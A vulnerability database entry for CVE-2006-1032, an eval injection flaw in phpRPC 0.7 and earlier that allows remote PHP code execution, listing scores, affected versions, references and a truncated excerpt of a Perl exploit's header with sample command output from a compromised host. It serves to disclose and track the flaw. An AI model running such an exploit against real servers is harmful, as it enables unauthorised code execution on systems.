CVE-2006-1032

Published: 07/03/2006 Updated: 08/03/2011

CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10

VMScore: 760

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Eval injection vulnerability in the decode function in rpc_decoder.php for phpRPC 0.7 and previous versions, as used by runcms, exoops, and possibly other programs, allows remote malicious users to execute arbitrary PHP code via the base64 tag.

Vulnerable Product	Search on Vulmon	Subscribe to Product
phprpc phprpc 0.8
phprpc phprpc 0.9
phprpc phprpc 0.7

phpRPC Remote Code Execution Vendor: Robert Hoffman Product: phpRPC Version: <= 07 Website: sourceforgenet/projects/phprpc/ BID: 16833 CVE: CVE-2006-1032 OSVDB: 23514 SECUNIA: 19028 PACKETSTORM: 44267 Description: phpRPC is meant to be an easy to use xmlrpc library phpRPC is greatly simplified with the use of database/rpc-proto ...

#!/usr/bin/perl # #root@host [~]# perl rpcpl phprpcsourceforgenet /modules/phpRPC/serverphp #--== IHS IRAN HOMELAND SECURITY ==-- # #phpRPC <= 07 commands execute exploit by LorD (wwwihsir) # #[IRAN HOMELAND SECURITY]$ uname -a;id;pwd #Linux sc8-pr-web9sourceforgenet 2610-1771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686 i6 ...

NVD-CWE-Other http://www.securityfocus.com/archive/1/426193 http://www.gulftech.org/?node=research&article_id=00105-02262006 http://www.securityfocus.com/bid/16833 http://securitytracker.com/id?1015691 http://secunia.com/advisories/19028 http://secunia.com/advisories/19058 http://securityreason.com/securityalert/502 http://www.vupen.com/english/advisories/2006/0745 https://nvd.nist.gov https://www.exploit-db.com/exploits/43836/

CVE-2006-1032

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect